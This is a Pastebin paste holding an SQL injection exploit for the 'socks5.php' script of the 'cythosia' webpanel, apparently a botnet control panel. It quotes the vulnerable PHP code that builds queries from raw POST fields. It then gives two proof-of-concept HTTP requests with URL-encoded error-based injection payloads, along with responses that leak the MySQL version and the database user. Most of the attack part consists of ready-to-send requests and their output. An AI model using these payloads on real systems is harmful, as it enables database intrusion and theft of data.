API tools faq
paste
Advertisement
nihil7771

SQLi

nihil7771
Feb 17th, 2019
133
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.58 KB | None | 0 0
raw download clone embed print report
  1. # Vuln-Code:
  2. #All POST-Parameters in the file "socks5.php" are vuln against
  3. SQL-Injection
  4. #
  5. #if(!empty($_POST['hwid']) && !empty($_POST['cn']) &&
  6. !empty($_POST['ip']) && !empty($_POST['port']))
  7. # {
  8. # $query = mysql_query("SELECT * FROM hydra_socks WHERE hwid =
  9. '".$_POST['hwid']."'");
  10. # if(mysql_num_rows($query) >= 1)
  11. # {
  12. # $sql = mysql_query("UPDATE hydra_socks SET ip =
  13. '".$_POST['ip']."', port = '".$_POST['port']."' WHERE hwid =
  14. '".$_POST['hwid']."'");
  15. # }
  16. # else
  17. # {
  18. # $sql = mysql_query("INSERT INTO hydra_socks (`hwid`,
  19. `country`, `ip`, `port`) VALUES ('".$_POST['hwid']."',
  20. '".$_POST['cn']."', '".$_POST['ip']."', '".$_POST['port']."')");
  21. # }
  22. # if(!$sql)
  23. # {
  24. # echo "fail";
  25. # echo mysql_error();
  26. # }
  27. ##############################Exploit########################################
  28. #
  29. # PoC 1 - Gets the MySQL Version Information:
  30. POST http://127.0.0.1/cythosia/Webpanel/socks5.php HTTP/1.1
  31. Host: 127.0.0.1
  32. Content-Type: application/x-www-form-urlencoded
  33. Content-Length: 322
  34. Accept: */*
  35. User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1;
  36. .NET CLR 2.0.50727) Miauu
  37. Connection: Close
  38.  
  39. hwid=1%27+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+concat%280x7e%2C0x27%2Cversion%28%29%2C0x27%2C0x7e%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+%271%27%3D%271&cn=test&ip=test&port=test
  40. Response:
  41. Warning: mysql_num_rows() expects parameter 1 to be resource,
  42. boolean given in C:xamppneuhtdocscythosiaWebpanelsocks5.php on line 11
  43. failDuplicate entry '~'5.5.32'~1' for key 'group_key'
  44. # PoC 2 - whoami?
  45.  
  46. POST /cythosia/Webpanel/socks5.php HTTP/1.1
  47. Host: 127.0.0.1
  48. Content-Type: application/x-www-form-urlencoded
  49. Content-Length: 319
  50. Accept: */*
  51. User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1;
  52. .NET CLR 2.0.50727)
  53. Connection: Close
  54.  
  55. hwid=1%27+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+concat%280x7e%2C0x27%2Cuser%28%29%2C0x27%2C0x7e%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+%271%27%3D%271&cn=test&ip=test&port=test
  56. Response:
  57. Warning: mysql_num_rows() expects parameter 1 to be resource, boolean
  58. given in C:xampphtdocscythosiaWebpanelsocks5.php on line 11
  59. failDuplicate entry '~'root@localhost'~1' for key 'group_key'
  60.  
  61. #############################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!